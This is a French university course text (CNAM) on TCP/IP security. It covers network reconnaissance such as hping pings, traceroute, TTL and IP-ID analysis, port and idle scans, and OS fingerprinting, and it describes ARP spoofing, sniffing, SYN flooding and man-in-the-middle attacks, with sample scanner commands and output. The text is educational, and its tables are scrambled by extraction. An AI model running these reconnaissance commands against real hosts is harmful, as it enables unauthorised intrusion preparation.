Le protocole UDP demeure infiniment plus simple que le protocole TCP. Un segment
UDP ne contient en effet que 5 champs :

Champ

Contenu

Source Port

Port UDP source

Destination
Port

Port UDP de destination

Longueur

Taille de len-tte UDP

Somme
contrle
DATA

de Somme de contrle de len-tte UDP


Contient les donnes pour le protocole de niveau suprieur

UDP nutilise aucun mcanisme daccus de rception et ne peut donc garantir que les
donnes ont t bien reues. Il ne rordonne pas les messages si ceux-ci narrivent pas
dans lordre dans lequel ils ont t mis, il nassure pas non plus de contrle de flux.

38

CNAM Jean-Christophe GALLARD

Les services
Les services de niveau applicatif utilisent un numro de port TCP ou UDP cod sur deux
octets permettant de les caractriser : il peut donc exister jusqu 65535 services sur un
mme systme. Les ports numrots de 1 1024 (galement appel well-known
ports ) sont gnralement rservs par le systme dexploitation (un processus de
niveau utilisateur ne peut gnralement pas se mettre en coute sur ces ports).
La plupart des services standard (comme le Web ou la Messagerie Electronique) coutent
sur des ports de service TCP spcifiquement ddis, mais rien nempche en thorie un
service serveur dcouter sur un numro de port autre que celui usuellement utilis.
Sigle

Port

Dsignation anglaise

Commentaire

FTP

20 et 21

File Transfer Protocol

telnet

23

Terminal network

SMTP

25

SQL
BOOTP

66
67

Simple
Mail
Transfer
Protocol
Structured Query Language
Boot Protocol

TFTP
HTTP

69
80

Trivial File Transfert Protocol


Hyper Text Transfer Protocol

Kerberos
POP3

88
110

Kerberos
Post Office Protocol

RPC

111

Remote Procedure Call

NNTP

119

NTP

123

Network
News
Transfer
Protocol
Network Time Protocol

NetBios

137

Netbios

SNMP

161

BGP
IRC

179
194

Simple Network Management


Protocol
border gateway protocol
Internet relay chat

transfert et manipulation de
fichiers
terminal virtuel en mode texte
ASCII
messagerie E-Mail limite du
texte ASCII
accs base de donnes Oracle
chargement logiciel machines
sans disque
transfert de fichiers simplifi
protocole du Web, vhiculant
HTML ou XML
login scuris
retrait de messages dans un
bureau de poste
excution d'
un sous-programme
distance
transmission de messages de
type news
synchronisation de la date et
l'
heure
accs Microsoft Windows NT
Server
administration de rseau

IMAP3

220

Internet Mail Access Protocol

rlogin

541

Notes
RPC

1352

Unix
Berkeley
distribution

39

software

routage
conversation temps rel sur
Internet
retrait de messages dans un
bureau de poste
login vers machine en confiance
accs bureau de poste Lotus
Notes

6
%

!
,

78 9
:

Caractristiques de scurit de TCP / IP


Le protocole IP ne fait que transmettre des paquets (en clair) dune station une autre.
Par construction, ce protocole souffre donc de certaines lacunes en termes de SSI :

il est possible dintercepter les paquets pour en lire le contenu (sniffing),


il ny a pas dauthentification, on peut prtendre avoir un numro IP qui nest pas
le sien (IP spoofing),
une connexion TCP peut tre intercepte et manipule par un attaquant situ sur
le chemin de cette connexion (TCP hijacking),
les implmentations du protocole TCP sont susceptibles dtre soumis des
attaques visant le dni de service (SYN flooding, Land attack, ping of death...).

Cas du protocole UDP


Le protocole UDP demeure problmatique du point de vue de la scurit. En effet, ce
protocole fonctionne en mode non connect, ce qui signifie quil ne peut exister de
garantie de remise des messages leur destinataire (donc pas de Three way
handshake comme dans TCP).
Une des consquences de lutilisation de ce protocole rside alors dans le fait que lon ne
peut pas rellement tablir une notion de contexte de session dans le cas dune
communication UDP (une requte = une rponse dans le meilleur des cas) ; nous
verrons plus tard que ce point particulier revt une importance capitale ds lors quil
sagira de mettre en place des solutions de filtrages rseaux volues.
De nombreux protocoles rseaux utilisent UDP comme vecteur de communication, cest
par exemple le cas du DNS (service de nommage Internet), du systme NFS (partages de
fichiers Unix) et de NIS (service de partage dinformations) tous deux reposant sur des
mcanismes dappels RPC (port UDP 111).

Techniques de recensement rseau


Ds linstant o un pirate souhaite attaquer une cible, il ne le fera de manire efficace que
sil dispose de suffisamment dinformations sur sa cible. Les particularits des protocoles
de communications pourront alors laider dans sa tche de recensement.

Ici demeurent les dragons


41

CNAM Jean-Christophe GALLARD

Le ping

Le programme Ping permet de vrifier si une autre machine est accessible. Le


programme Ping envoie une requte ICMP de type 0 (Echo Request) contenant un
numro de squence une machine cible, qui met en rponse une rponse ICMP de
type 8 (Echo Reply) contenant le numro de squence prcis.
,

1 %
.,

%/

'2 '&

3'

.,/

'&
%

Format du message ICMP pour la requte et la rponse Echo

Ping est capable d'


afficher le temps ncessaire la rponse par comparaison entre
l'
heure d'
mission du paquet ICMP et l'
heure de rception. Cette fonctionnalit peut
indiquer l'
loignement relatif d'
une machine.
Le ping classique (mission dune requte ICMP de type ECHO REQUEST) demeure
le moyen le plus simple deffectuer un recensement exhaustif des machines prsentes
dans un sous rseau.

Ping TCP

Lorsque le ping classique ne fonctionne pas, gnralement en raison dun filtrage du


protocole ICMP sur un nud intermdiaire, il est possible de raliser un TCP ping .
Le principe du TCP ping consiste mettre un segment TCP destination dune machine
et sur un port donn. Si la machine est prsente, et que le paquet ainsi form nest pas
filtr par un quipement intermdiaire, la machine considre rpondra soit par un
segment SYN-ACK (indiquant que le port est ouvert) soit par un segment RST (indiquant
que le port est ferm). Cette rponse quelle quelle soit ! - trahit en elle mme la
prsence de lquipement vis par ce type de ping.
Un utilitaire comme hping peut raliser trs simplement un tel TCP ping :
hping p 80 180.10.1.50

Loption denregistrement de route

Le programme ping (tout comme lutilitaire hping2) permet galement d'


examiner
l'
enregistrement IP correspondant l'
option enregistrement de route (Route Record - RR),
par l'
option R (-r pour le ping Microsoft). Cette option spcifie au routeur de grer le
datagramme afin d'
ajouter son adresse IP une liste dans le champ des options. Lorsque
le datagramme atteint sa destination finale, la liste des adresses IP est alors copie dans
la rponse ICMP sortante et tous les routeurs sur le chemin du retour ajoutent galement
leurs adresses IP la liste.

42

CNAM Jean-Christophe GALLARD

'

'

'

7'

7$

7$

9:

78

38

Format gnral de l'


option denregistrement de route dans l'
en-tte IP
Prcisons que le champ Header Lenght dans l'
en-tte IP dispose d'
une taille de 4 octets,
ce qui limite la taille totale de l'
en-tte IP 15 mots de 32 bits. Puisque la taille de l'
en-tte
IP est de 20 octets, et que l'
option RR utilise 3 octets d'
overhead, il reste 37 octets pour la
liste, ce qui autorise au plus neuf entres dans la liste (9 fois 4 octets d'
adresse, soit 32
octets). Dans la plupart des implmentations l'
adresse IP ajoute par un routeur est celle
de son interface sortante. Pour ce qui est de la machine de destination, celle-ci fournit
gnralement les deux adresses (entrantes et sortantes).
Nous voyons donc que Ping permet de reconstituer dans une certaine mesure la
topologie du rseau entre deux machines, ce qui est d'
un intrt indiscutable pour le
problme de recensement qui nous intresse.
Le simple ping du monde Unix peut servir raliser cette dcouverte rseau :
ping R 180.10.1.50
Si le protocole ICMP est filtr, hping peut galement implmenter un tel mcanisme sur
TCP :
hping p 80 G 180.10.1.50
Si certains Firewall liminent des paquets IP les options denregistrements de route,
quasiment aucun routeur filtrant du march ne sait actuellement le faire.

Traceroute

Le programme traceroute permet de rcuprer la route suivie pour une communication


entre deux machines. Compte tenu des limitations de l'
option RR (neuf adresses au
maximum, option IP pas forcment implmente par les routeurs), c'
est ce programme
qui est le plus souvent utilis pour visualiser les routes prises par les paquets rseau.
Traceroute utilise ICMP et le champ TTL de l'
en-tte IP. Le champ TTL est une valeur
code sur 8 bits et que l'
metteur fixe une valeur donne. Chaque routeur qui reoit le
datagramme dcrmente cette valeur avant de r-mettre le paquet. Quand un paquet
ayant un TTL 0 ou 1 est rencontr, le routeur dtruit le paquet et rmet l'
metteur
un paquet ICMP de type 11 (Time exceeded).
Le programme traceroute commence par mettre un paquet IP avec un TTL 1. Le
premier routeur rencontr limine le paquet et renvoie une rponse Time Exceeded ce qui
identifie le premier routeur. Traceroute envoie alors un second paquet avec un TTL 2 ;
le second routeur reoit le paquet avec un TTL 1 (le premier routeur a dcrment le
TTL) qu'
il dtruit et renvoie l'
metteur un paquet ICMP Time Exceeded, ce qui identifie
le second routeur. Traceroute continue ainsi son exploration, de proche en proche.
Prcisons que le programme Traceroute met des paquets UDP vers la machine cible en
utilisant des numros de ports pour lesquels il est fort improbable que la machine de
destination utilise (ports suprieurs 30000). A la rception du paquet final par le
destinataire, celui-ci r-met donc un paquet ICMP Port Inaccessible, indiquant
traceroute que son travail est termin.

43

CNAM Jean-Christophe GALLARD

Dans le cas du traceroute UNIX, ce sont des segments UDP qui sont mis vers la cible,
alors que le tracert Windows met des paquets ICMP.
Toutefois, certains systmes filtrent en entre de leur rseau le protocole UDP, voire
mme le protocole ICMP. De fait, les segments de traceroute classique ne parviendront
alors jamais leur destination.

TCP traceroute

Afin de pallier le manque du traceroute classique dcrit prcdemment, on peut raliser


un traceroute manuel en utilisant le protocole TCP. Le principe est le mme que le
traceroute dorigine, mais on met des segments TCP en lieu et place des segments UDP
et de prfrence sur un port de service que lon sait ouvert (suite un scan de port de
service pralable par exemple).
hping tll 1 bind p 80 180.10.1.50
Loption bind permet de lier lappui de la squence de touches Ctrl-Z une
incrmentation du TTL. On commence 1, puis chaque Ctrl-Z augmente le TTL dune
unit. Ds rception dun segment de type ACK-SYN, le TCP traceroute peut tre
considr comme termin.

Analyse des TTLs des rponses aux requtes


Dtermination du nombre de sauts
Si aucune des techniques de traceroute prcdemment dcrites ne fonctionne, il reste
toujours possible destimer le nombre de sauts ncessaires pour atteindre sa cible, sans
pour autant dterminer les adresses de ces nuds intermdiaires.
La premire implmentation de cette technique, pourtant trs simple, a t vue sur loutil
scanrand de Dan Kaminsky en 2002 et elle consiste partir du principe que les TTLs
initiaux sont gnralement bass sur des multiples de 16. Ainsi, une trame dont le TTL est
29 a de fortes probabilits pour quelle ait travers 3 nuds (32 - 29 = 3) avant de
parvenir destination.
Mise en vidence dun systme de filtrage ou dun quipement transparent
En outre, une telle analyse des TTLs peut galement mener la dtection dun systme
de filtrage intermdiaire. Un exemple avec loutil Scanrand de Dan Kaminsky:
# scanrand -b1k -e local.test.com:80,21,443,465,139,8000,31337
UP:
64.81.64.164:80
[11]
0.477s
DOWN:
64.81.64.164:21
[12]
0.478s
UP:
64.81.64.164:443
[11]
0.478s
DOWN:
64.81.64.164:465
[12]
0.478s
DOWN:
64.81.64.164:139
[22]
0.488s
DOWN:
64.81.64.164:8000 [22]
0.570s
DOWN:
64.81.64.164:31337 [22]
0.636s

Dans la capture qui prcde, les premiers rsultats semblent indiquer que la cible se situe
11 ou 12 sauts. Pour les ports 139, 8000 et 31337 (ferms), le nombre de sauts monte
subitement 22. Ce comportement trange est d un firewall de type Cisco PIX qui
met trop rapidement - un paquet de type RST-ACK aux dernires requtes en
reprenant notre TTL initial (ce dernier est donc dcrment deux fois sur le rseau).
En effet, la grande majorit des systmes devant rpondre rapidement une requte
(cest le cas pour lmission dun segment RST puisquun tel segment ne doit pas tre
prioritaire par rapport un trafic dit normal ), utilise le paquet dorigine comme
44

CNAM Jean-Christophe GALLARD

prototype du segment RST et donc reprend une grande partie des champs dorigine,
dont le TTL.

Analyse corrle des identifiants IP

Lanalyse des IDs IP des paquets reus peut tre une source non ngligeable
dinformations. En particulier, une telle analyse permet de dtecter :

Une usurpation des paquets de rponses par un systme filtrant,


La dtection de systmes quilibrage de charge.

Les identifiants IP permettent didentifier de faon unique un paquet IP. Leur gnration
par les piles TCP/IP suit bien souvent une logique de type incrmentale : chaque paquet
gnr recevra un numro dID gal au numro dID prcdent incrment dune valeur
fixe, gnralement 1. Ils sont galement utiliss pour permettre le mcanisme de
fragmentation IP (chaque fragment dun mme paquet IP dorigine aura le mme ID IP).
Dtection de lusurpation des paquets de rponses par un systme filtrant.
Dans lexemple qui suit, on tente une connexion sur la machine 180.10.1.50 sur les ports
79 83 (on incrmente les ports de service par lutilisation du Ctrl-Z) :
# hping S p 79 180.10.1.50
HPING 180.10.1.50 (eth0 180.10.1.50): S set, 40 headers + 0 data bytes
len=46 ip=180.10.1.50 flags=RA seq=0 ttl=125 id=28457 win=0 rtt=0.5 ms
len=46 ip=180.10.1.50 flags=RA seq=1 ttl=125 id=28458 win=0 rtt=0.4 ms
80 : len=46 ip=180.10.1.50 flags=SA seq=3 ttl=124 id=7821 win=0 rtt=0.4 ms
len=46 ip=180.10.1.50 flags=SA seq=4 ttl=124 id=7822 win=0 rtt=0.4 ms
len=46 ip=180.10.1.50 flags=SA seq=5 ttl=124 id=7823 win=0 rtt=0.4 ms
81 : len=46 ip=180.10.1.50 flags=RA seq=6 ttl=125 id=28460 win=0 rtt=0.4 ms
82 : len=46 ip=180.10.1.50 flags=RA seq=7 ttl=125 id=28461 win=0 rtt=0.4 ms
83 : len=46 ip=180.10.1.50 flags=RA seq=8 ttl=125 id=28462 win=0 rtt=0.4 ms

On remarque que les IDs IP suivent une logique particulire SAUF lorsque lon
slectionne le port 80, ou la logique diffre. On remarque galement que, dans ce cas
prcis, la rponse est de type SYN-ACK.
Dans ce cas de figure, on a certainement affaire un lment de filtrage qui :

laisse passer les segments TCP destination du port 80 (les IDs IP en 78xx sont
donc ceux de la machine cible)
filtre les autres segments et rpond la place de la cible en falsifiant ladresse
source (les IDs IP en 28xxx sont alors ceux de lquipement de filtrage).

Notons en outre que lquipement de filtrage trahit galement sa prsence par un TTL
diffrent de celui du serveur
Dtection de systmes quilibrage de charge
Dans lexemple qui suit, on tente une connexion sur le port 80 de la machine 180.10.1.50
:
# hping S p 80 180.10.1.50
HPING 180.10.1.50 (eth0 180.10.1.50): S set,
len=46 ip=180.10.1.50 flags=SA seq=0 ttl=125
len=46 ip=180.10.1.50 flags=SA seq=1 ttl=125
len=46 ip=180.10.1.50 flags=SA seq=2 ttl=125
len=46 ip=180.10.1.50 flags=SA seq=3 ttl=125

45

40 headers + 0
id=28457 win=0
id=32867 win=0
id=28458 win=0
id=32868 win=0

data bytes
rtt=0.5 ms
rtt=0.4 ms
rtt=0.4 ms
rtt=0.4 ms

CNAM Jean-Christophe GALLARD

len=46
len=46
len=46
len=46
len=46
len=46

ip=180.10.1.50
ip=180.10.1.50
ip=180.10.1.50
ip=180.10.1.50
ip=180.10.1.50
ip=180.10.1.50

flags=SA
flags=SA
flags=SA
flags=SA
flags=SA
flags=SA

seq=4
seq=5
seq=6
seq=7
seq=8
seq=9

ttl=125
ttl=125
ttl=125
ttl=125
ttl=125
ttl=125

id=28459
id=32869
id=28460
id=32870
id=28461
id=32871

win=0
win=0
win=0
win=0
win=0
win=0

rtt=0.4
rtt=0.4
rtt=0.4
rtt=0.4
rtt=0.4
rtt=0.4

ms
ms
ms
ms
ms
ms

On remarque ici quun segment de rponse sur deux semble correspondre deux
logiques de positionnement dIDs distinctes. Ce cas de figure est typique dun systme
quilibrage de charge : soit on dispose ici de deux serveurs Web en cluster, chacun
rpondant alternativement afin de lisser la charge de trafic, soit il sagit dquipements
intermdiaires dquilibrage de charge (cas de deux firewalls en parallle par exemple).

Le Port Scanning

Le port scanning est une mthode active utilise pour recenser les services rseaux
accessibles sur une machine.
Dans le protocole TCP, un service coute sur un ou plusieurs ports TCP, identifiant ainsi
le type de service disponible. Ainsi, le protocole HTTP utilise le port TCP 80, le protocole
SMTP le port 25, etc.
Il existe de nombreuses techniques de port scanning , toutes utilisant les particularits
des protocoles rseau pour dterminer la prsence (ou labsence) dun service prcis.
La technique la plus simple pour raliser un TCP port scanning est celle dite du SYN
scan . Le SYN scan consiste profiter du Three way handshake de TCP pour
dterminer si un service est en coute sur un port.
En effet, tout segment TCP de type SYN (flag SYN positionn) sur un port actif, le
serveur doit rpondre par un segment de type ACK-SYN. Au cas o aucun service ne
serait en coute sur le port considr, la pile TCP/IP doit rpondre par un segment de
type RST (flag RST ou ReSeT positionn). Ainsi, pour tout segment de type ACK-SYN
reu suite lmission dun segment SYN, on considrera que le port TCP est ouvert :

Cette technique souffre cependant de nombreux inconvnients et peut donc tre mise en
dfaut :

Si un quipement rseau filtre les segments entre lagresseur et le serveur, la non


rception dun segment ACK-SYN une requte ne permet pas de conclure (le
segment peut tre absorb par llment de filtrage, ce dernier peut couper la
46

CNAM Jean-Christophe GALLARD

connexion par un segment RST en usurpant ladresse du serveur laissant croire


lattaquant que le port est ferm).
La mthode nest pas discrte : sous UNIX, ces connexions russies seront
systmatiquement enregistres dans les journaux SYSLOG.
Il est facile de dtecter un tel scan (65535 segments en provenance de la mme
machine, sur lensemble des ports TCP et dans un court laps de temps)
Le scan peut tre long sachever : si un quipement intermdiaire absorbe les
segments SYN du pirate, on rentre dans une procdure de r-mission, puis de
time-out , extrmement pnalisante en termes de temps de traitement.

De nombreuses autres mthodes de port scanning ont alors t dveloppes pour contrer
ces inconvnients. Un outil comme nmap les implmente presque toutes, mais son
utilisation demeure moins aise que dautres outils.
Parmi ces autres mthodes, citons le half-syn scan , le Xmas scan , le Ymas
scan , lICMP scan et la technique du idle host scanning utilisant un outil comme
hping .

La technique du idle host scanning

La technique du idle host scanning ne constitue pas proprement parler une mthode
de scan furtif. Au contraire, une telle opration demeure particulirement visible au niveau
de la cible, mais lintrt de cette technique est de leurrer la victime quant lorigine du
scan.
La mcanique de base du idle host scanning consiste en une analyse des IDs IP
des requtes.
Elle repose sur les points suivants :

Un port TCP est considr comme ouvert lorsquune application coute sur ce
port. Dans le cas contraire, le port est dit ferm .
La manire la plus simple de dterminer si un port est ouvert ou ferm est
dmettre un segment TCP de type SYN sur ce port. La machine cible rpondra
par un segment SYN-ACK si le port est ouvert ou par un segment RST-ACK si le
port est ferm
Une machine recevant un segment de type SYN-ACK non sollicit rpondra par
un segment RST
Une machine recevant un segment de type RST non sollicit ignorera simplement
le segment
La plupart des systmes (Windows en tte) incrmente simplement les IDs IP
dune valeur de 1 chaque mission dun paquet IP. Dans de telles conditions,
lanalyse de ces champs permet donc de dterminer facilement combien de
paquets ont t mis depuis le dernier paquet reu.

Grce cette particularit, il est donc possible de raliser un scan de port de service en
faisant croire la cible que lorigine de lattaque est une machine dite zombie , choisie
de telle sorte :

quelle ne communique avec aucune autre machine (ie : aucune trame nest
mise par cette machine)
que la gnration des IDs IP soit prvisible (typiquement, on slectionnera une
machine Windows dont les ID sont incrments de 1 chaque gnration

Le scan seffectue en trois passes :


1. Lattaquant met un SYN-ACK au zombie, qui rpond par un RST et on en profite
pour noter lID IP de ce paquet.
2. Lattaquant met un SYN la cible en usurpant ladresse du zombie et sur un port
donn
47

CNAM Jean-Christophe GALLARD

3. Lattaquant met un SYN-ACK au zombie, qui rpond par un RST et on en profite


pour noter lID IP de ce dernier paquet.
Dans le cas de figure o le port est ouvert, on obtient un trou dans le squenage des
IDs IP, comme lindique la figure suivante :

Si le port est ferm, le squenage des IDs IP du zombie ne montre aucun trou particulier
:

Nota : jusqu peu, la mise en uvre dun tel type de scan ncessitait dutiliser loutil
hping et quelques scripts crs spcialement. Dsormais, les dernires versions de loutil
nmap disposent dune option autorisant cette mthode

La technique de scan sans tat de scanrand

Scanrand, de Dan Kaminsky, demeure un scanner de ports de services un peu part


dans la mesure o son architecture interne diffre trs sensiblement des autres outils
similaires.
Scanrand est un scanner de ports de services ultra-rapide, intgr dans la suite doutils
Paketto Keiretsu Sa particularit rside dans le fait que la partie mettrice est dcouple
de la partie rception ; ce sont deux processus spars qui effectuent ces oprations et,
dans le cas limite expos ici, ces deux processus peuvent ne pas se trouver sur la mme
machine.
48

CNAM Jean-Christophe GALLARD

La partie mettrice se comporte comme nimporte quel scanner de port de services, en


mettant des segments SYN sur des ports TCP donns. Du fait que le processus
metteur na pas grer les retours de requtes, il peut mettre une vitesse nettement
suprieure un scanner classique.
Lmetteur peut falsifier ladresse source et, surtout, il forge pour chaque segment un
numro de squence particulier bas sur un calcul cryptographique de type HMAC-SHA1,
tronqu 32 bits et utilisant un sel paramtrable. Le mcanisme est appel par Kaminsky
Inverse SYN cookie
Lorsque lmetteur rceptionne un paquet de rponse, il vrifie que le ACK number du
paquet reu correspond bien la signature dun scan de scanrand et non une autre
connexion.
Il est donc possible de raliser un scan de ports de services, dont la partie rceptrice
demeure fixe mais reste totalement invisible aux cibles pusiquelle demeure totalement
passive.

Dtection de systmes dexploitation

La dtermination du type de systme dexploitation sur lequel fonctionne une machine


cible constitue lun des premiers point claircir avant toute attaque au travers dun
rseau. De nombreuses techniques existent, et les paragraphes qui suivent tentent de
donner un bref aperu des ces techniques.
Bannires de Telnet
La premire des techniques de dtection de systme dexploitation dcrite ici est
galement historiquement la premire avoir vu le jour. Le principe de cette technique
consiste se connecter des services TCP ouverts sur une machine et rcuprer les
diffrentes bannires qui sont prsentes laccueil de ces services.
Pour ce type de dtection, les services Telnet, Ftp, Smtp et http sont tout particulirement
indiqus puisque ceux-ci peuvent tre utiliss sans outils trs volus (un simple client
Telnet suffit pour mener bien cette opration).
Les services les plus anciens dans le monde de lInternet fonctionnent en effet en mode
texte, cest dire que le dialogue entre un client et le serveur seffectue par le biais dune
interface console adapte la frappe de commandes par un oprateur humain (time-outs
trs larges, mode caractre 7 bits, commandes simples avec peu de paramtres, pas de
transfert de commandes en mode binaire pur). De plus, ces services ont tous t
programms pour offrir un certain niveau de politesse ; dans limmense majorit des
cas, ces services annoncent ds la connexion (et avant toute authentification ventuelle)
le type, voire la version, du systme dexploitation de support.
root> telnet hpux.cible.com
Trying 123.45.67.89...
Connected to hpux.cible.com.

49

CNAM Jean-Christophe GALLARD

Escape character is '^]'.


HP-UX hpux B.10.01 A 9000/715 (ttyp2)
login:

Ce type de dtection prsente cependant quelques inconvnients : dune part, il est


toujours possible de dsactiver ces bannires et, dautre part, ces bannires peuvent tre
modifies (soit pour supprimer ces informations sur le systme d'
exploitation, soit pour
mentir sur l'
tat de celui-ci).
Mme si ces bannires sont dsactives ou modifies, certains services offrent
cependant la possibilit de rcuprer des informations avec des commandes particulires.
Dans l'
exemple qui suit, la bannire FTP offre peu d'
information sur le systme cible,
mme si l'
on repre la prsence d'
une machine Unix en Systme V (ce qui laisse tout de
mme de nombreuses possibilits). La commande SYST donne alors des prcisions
supplmentaires.
root> telnet ftp.cible.com 21
Trying 123.45.67.89...
Connected to ftp.cible.com.
Escape character is '^]'.
220 ftp29 FTP server (UNIX(r) System V Release 4.0) ready.
SYST
215 UNIX Type: L8 Version: SUNOS

Si de plus les connexions ftp anonymes sont possibles, il est toujours intressant de
rcuprer des fichiers binaires qui donneront des informations supplmentaires sur
l'
architecture de la cible.
De plus, on trouvera toujours des services rseau dont le comportement au niveau des
bannires n'
est pas paramtrable et qui, sans donner d'
informations prcises sur le
systme d'
exploitation support, permettent de dduire sur son type. L'
exemple qui suit
utilise l'
outil netcat (nc) afin de raliser une connexion HTTP sur une machine et de
rcuprer le type de serveur :
root> echo 'GET / HTTP/1.0\n' | nc www.cible.com 80 | egrep '^Server:'
Server: Microsoft-IIS/4.0

Le serveur cible est donc ici trs probablement une machine de type Windows NT
(ventuellement Windows 2000), puisque IIS 4.0 ne tourne que sur ce type de plateforme.
Dtection par analyse de la pile rseau
Comme nous venons de le voir, les techniques d'
identification de systmes d'
exploitation
par analyse des bannires de Telnet ont de graves limitations. C'
est pourquoi, il est plus
intressant d'
utiliser une autre technique qui est celle largement dveloppe dans
l'
utilitaire nmap avec son option -O.
Cette technique repose sur le principe suivant : chaque systme d'exploitation utilise
une implmentation des piles TCP/IP qui lui est propre. En effet, mme si il existe des
RFC dcrivant ce que doit tre le comportement standard d'
une pile rseau, ces RFC ne
sont pas toujours suivies scrupuleusement (parfois mme pour d'
excellentes raisons !) et
elles laissent parfois des zones d'
ombre qui peuvent prter interprtation. L'
ide
gnrale est donc de mener un certain nombre de tests qui dessineront un motif type d'
un
systme d'
exploitation, voire mme d'
une version donne d'
un systme d'
exploitation.
Quelques exemples :
50

CNAM Jean-Christophe GALLARD

L'
interrogation FIN (FIN probe)
Le principe est d'
envoyer un paquet FIN (ou tout autre paquet sans le flag SYN ou
ACK) un port ouvert et d'
attendre une rponse. Le comportement normal, dcrit par
la RFC 793, est de ne PAS rpondre ce paquet, mais de nombreuses
implmentations renvoient un paquet RST (Windows, BSDI, CISCO, HP/UX, MVS et
IRIX).
L'
interrogation par flag inconnu (Bogus flag probe)
Le principe est d'
envoyer un paquet SYN disposant d'
un flag TCP inconnu (64 ou 128
par exemple). Les versions de Linux antrieures la 2.0.35 conservent ce flag dans
leur rponse. Certaines machines ralisent un reset de la connexion en cas de
rception d'
un tel paquet.
Echantillonage TCP ISN
L'
ide est ici de trouver des motifs particuliers dans les numros de squences
initiaux (Initial Sequence Numbers - ISN), choisis par les implmentations de TCP en
rponse un paquet SYN. Ces motifs peuvent tre catgoriss en plusieurs groupes ;
les traditionnels 64k (vieilles machines UNIX), les incrments alatoires (versions
rcentes de Solaris, IRIX, FreeBSD, Digital UNIX, Cray...), les modles bass sur la
date et l'
heure (Microsoft Windows), voire mme les modles "constants" qui utilisent
toujours le mme ISN (certains hubs 3com, imprimantes Apple LaserWriter) etc.

Exemples de vulnrabilits des protocoles TCP / IP


Manipulation ARP et ARP Spoofing

Dans une architecture de rseau TCP/IP, il est possible de leurrer un matriel rseau de
niveau 2 (commutateur ou bien directement les cartes ethernet des stations), afin de lui
faire rediriger le flux d'
information entre deux machines A et B vers une troisime machine
C.
Le principe consiste, depuis la machine C, pinger les deux machines A et B, rcuprer
les adresses MAC de ces deux machines puis envoyer deux trames ARP (Gratuitous
ARP). La premire indique A que B dispose dsormais d'
une adresse MAC qui est celle
de C, la seconde indique B que A dispose dsormais d'
une adresse MAC qui est celle
de C. Tous les flux d'
information entre A et B sont dsormais redirigs vers C, qui a alors
la possibilit de les stocker pour utilisation ultrieure. Cette technique oblige C assurer
un forwarding des paquets entre A et B (et donc rcrire les enttes des paquets) pour
que la communication entre A et B puisse avoir lieu ; C devient alors une sorte de routeur
de niveau Ethernet.

Plus techniquement, il s'


agit d'
envoyer A une requte ARP gratuite contenant l'
adresse
MAC de C et l'
adresse IP de B, puis d'
envoyer B une requte ARP gratuite contenant
l'
adresse MAC de C et l'
adresse IP de A.
51

CNAM Jean-Christophe GALLARD

Cette mme technique peut galement tre utilise afin de raliser du spoofing d'
adresse.
On utilise pour cela la premire moiti de l'
attaque dcrite prcdemment ; soient A un
client, B un serveur et C l'
attaquant, C va envoyer une requte ARP gratuite A
contenant l'
adresse MAC de C et l'
adresse IP de B. Cela pour effet de drouter tous les
paquets destins B vers C. Cette technique permet donc C de se faire passer pour B.
Notons que la situation dcrite ici peut s'
inverser dans la mesure o B met rgulirement
des rponses ARP non sollicits par A ce qui a pour effet de faire revenir A sa situation
antrieure ; aussi, pour maintenir ce spoofing dans le temps, C doit mettre rgulirement
des requtes ARP spoofes (au moins une par minute).

IP Sniffing

Le principe de lIP sniffing consiste pour un agresseur couter les trames circulant sur
son segment rseau puis les dcoder, protocole par protocole, couche par couche.
Il sagit principalement dune mthode passive (les trames ne sont pas modifies par cette
opration), essentiellement utilise pour atteindre en confidentialit linformation.
On utilise pour ce faire des outils de type analyseurs rseaux , soit spcifiques une
action particulire (cas des analyseurs spcifiquement dvelopps pour extraire des mots
de passe en clair transitant sur le rseau), soit gnralistes (Sniffer Pro de Network
Associates, Ethereal, tcpdump) mais dtourns de leur fonction initiale ( savoir
lanalyse des problmes rseaux).
Cette technique ne peut tre mise en uvre que si lon satisfait lune des deux
conditions suivantes :

Lagresseur doit tre situ sur le chemin rseau entre le client et le serveur,
Le segment rseau dappartenance de lagresseur doit utiliser une technologie
diffusion (token ring ou Ethernet dans leurs concepts initiaux par exemple)

IP Spoofing

LIP Spoofing consiste falsifier son adresse IP pour faire passer sa propre machine pour
une autre. LIP spoofing est souvent utilis par des attaquants pour bnficier des
mcanismes de confiances qui peuvent tre mis en uvre dans certains systmes.
De nombreuses techniques peuvent tre mises en uvre pour raliser cette opration
dusurpation didentit dune machine :

Modification de ladresse IP dune machine.


Modification de ladresse hardware dune station de travail (adresse MAC).
Cration de messages ICMP-redirect pour rediriger des paquets IP vers une
station contrle par un intrus.
Compromission dun serveur DNS pour rediriger une requte DNS vers une
station contrle par un intrus.
Introduction de segments TCP avec des numros de squence appropris dans
une connexion.
52

CNAM Jean-Christophe GALLARD

SYN Flooding

Le SYN flooding est une attaque visant mettre en uvre un dni de service sur la
machine cible. Elle consiste mettre un flot ininterrompu de demandes de connexion sur
un port TCP ouvert sans poursuivre les changes, et de prfrence en falsifiant ladresse
source.
Dans les piles TCP/IP vulnrables, cette action mne une saturation de lespace
mmoire rserve la pile rseau puis, terme, son plantage.

Source Routing

Le source routing profite de la possibilit offerte lmetteur dun paquet IP de spcifier la


route de retour pour les paquets mis, ce qui permet doutrepasser les rgles de routages
des routeurs intermdiaires.
Ce mcanisme est souvent utilis en cas dIP Spoofing en conjonction avec la prdiction
de numros de squence TCP/IP. Il permet un attaquant de rediriger une partie du trafic
sur son poste et dusurper lidentit dun utilisateur.

Fragmentation IP

Quand un paquet IP de taille suprieure la MTU est rencontr sur un routeur, il est
fragment en plusieurs paquets de taille infrieure ou gale la MTU du routeur.

Ce mcanisme de fragmentation a deux consquences directes sur la scurit du


protocole :
Le premier paquet fragment est le seul contenir un en-tte TCP => problme de
filtrage !
7

Maximum Transfer Unit : taille maximale dun paquet IP quun quipement actif de rseau est
capable de traiter. Typiquement, la MTU IP est presque toujours rgle 1500, ce qui correspond
la taille maximum dune trame Ethernet.
53

CNAM Jean-Christophe GALLARD

Le premier paquet contient les informations ncessaires pour reconstituer le paquet


dorigine => que se passe t-il si ces informations sont invalides ?

Attaques Man in the middle

Les attaques Man in the Midlle , galement appeles Monkey in the Middle
8
(attaque du singe rpteur), sont des attaques communes la quasi-totalit des
protocoles rseaux.
Elles consistent pour un agresseur sinsrer dans une communication en se
positionnant en coupure entre un client et un serveur. Lagresseur peut alors :

Relayer les requtes (coute quasi passive)


Remplacer le serveur ou le client tout moment (usurpation totale)

La seule parade efficace contre ce type dattaque demeure la signature des paquets
rseaux entre le client et le serveur (en cas de modification des paquets IP en cours
dacheminement, celle-ci sera alors dtecte par le destinataire puisque la signature sera
devenue invalide)
